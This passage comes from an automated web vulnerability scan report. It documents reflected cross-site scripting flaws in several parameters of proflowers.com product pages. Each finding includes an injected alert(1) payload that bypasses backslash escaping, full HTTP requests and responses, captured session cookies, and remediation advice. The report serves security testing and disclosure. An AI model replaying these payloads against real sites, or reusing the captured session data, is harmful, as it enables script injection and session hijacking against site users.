Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:34:18 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:34:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:18 GMT
Content-Length: 142585


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
pod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a
" != "")
           {
               s.eVar20="PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS
...[SNIP]...

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38208\"%3balert(1)//9789dc0b2fb was submitted in the trackingpgroup parameter. This input was echoed as 38208\\";alert(1)//9789dc0b2fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS38208\"%3balert(1)//9789dc0b2fb&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:31:55 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:31:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:31:56 GMT
Content-Length: 137304


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
arden");
           s.prop1 = cleanString("PFC:Product:30008396-DeluxeSucculentGarden");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           else if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCart" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           
...[SNIP]...

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42874\"%3balert(1)//eb3bd423121 was submitted in the viewpos parameter. This input was echoed as 42874\\";alert(1)//eb3bd423121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=142874\"%3balert(1)//eb3bd423121&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:29:45 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:45 GMT
Content-Length: 138703


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
3_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30008396;;;event5=1|event22=142874\\";alert(1)//eb3bd423121|event23=0.00";
       }

   </script>
...[SNIP]...

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82dd\"%3balert(1)//0a10d56d3ce was submitted in the Ref parameter. This input was echoed as c82dd\\";alert(1)//0a10d56d3ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRefc82dd\"%3balert(1)//0a10d56d3ce HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:27:58 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:27:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:27:57 GMT
Content-Length: 146906


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30003767","30003767","30003767","168084","27","HomeNoRefc82dd\\";alert(1)//0a10d56d3ce","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221e8\"%3balert(1)//f195e3e5061 was submitted in the tile parameter. This input was echoed as 221e8\\";alert(1)//f195e3e5061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA221e8\"%3balert(1)//f195e3e5061&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:26:08 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:26:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:08 GMT
Content-Length: 146314


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
_leftpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA221e8\\";alert(1)//f195e3e5061" != "")
           {
               s.eVar20="PFC_hmpg_podA221e8\\";alert(1)//f195e3e5061_";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodVi
...[SNIP]...

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83ea7\"%3balert(1)//17cc815a216 was submitted in the trackingpgroup parameter. This input was echoed as 83ea7\\";alert(1)//17cc815a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS83ea7\"%3balert(1)//17cc815a216&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:23:30 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:23:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:29 GMT
Content-Length: 141553


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
lant");
           s.prop1 = cleanString("PFC:Product:30003767-TheUltimateOfficePlant");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           else if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCart" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           
...[SNIP]...

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff98b\"%3balert(1)//1f7c8e9547f was submitted in the viewpos parameter. This input was echoed as ff98b\\";alert(1)//1f7c8e9547f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6ff98b\"%3balert(1)//1f7c8e9547f&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
